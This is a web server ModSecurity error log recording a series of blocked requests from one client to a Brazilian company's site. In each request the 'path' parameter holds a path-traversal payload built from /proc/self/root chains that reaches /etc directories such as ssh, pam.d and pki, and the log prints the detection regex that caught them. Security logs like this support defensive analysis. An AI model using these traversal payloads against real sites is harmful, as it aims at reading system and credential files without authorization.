[Mon Mar 16 12:24:19.326018 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:48610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggo7ABkC4fWIHEf8HotgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:20.621571 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:44864] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggpJqj1wV0Si-OkefrzwAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:21.867092 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.243.203:44874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggpY6lpbStxTqkSktqYQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:23.005639 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:44880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggp3jZBu2q05ozVU9V3wAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:24.275577 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:44892] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggqAlT9VtDQc7bgUyu4AAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:26.421041 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:44896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggqQlT9VtDQc7bgUyu4QAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:27.789471 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:44902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggq46lpbStxTqkSktqaAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:28.892905 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:44912] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggrHjZBu2q05ozVU9V4AAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:30.078894 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.243.203:50588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggrnbQATo66fKoS7xNXAAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:31.872386 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.243.203:50598] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggr3jZBu2q05ozVU9V4QAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:33.243143 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:50610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggsRXjF1vJNtV6CWrz1gAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:34.607408 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:50620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggshXjF1vJNtV6CWrz1wAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:35.898624 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:50630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggswlT9VtDQc7bgUyu4wAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:37.230830 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:50634] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggtf9ocpUE4ed4uDzsZQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:38.584355 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:50638] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggto6lpbStxTqkSktqdAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:39.887276 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:50640] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggtxXjF1vJNtV6CWrz2QAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:41.219192 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.243.203:52486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgguXbQATo66fKoS7xNYAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:42.514239 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.243.203:52490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgguhXjF1vJNtV6CWrz2wAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:46.036626 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:52502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggvP9ocpUE4ed4uDzsaAAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:48.482505 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:52508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggv3jZBu2q05ozVU9V4wAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:49.818183 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:52518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggwXjZBu2q05ozVU9V5QAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
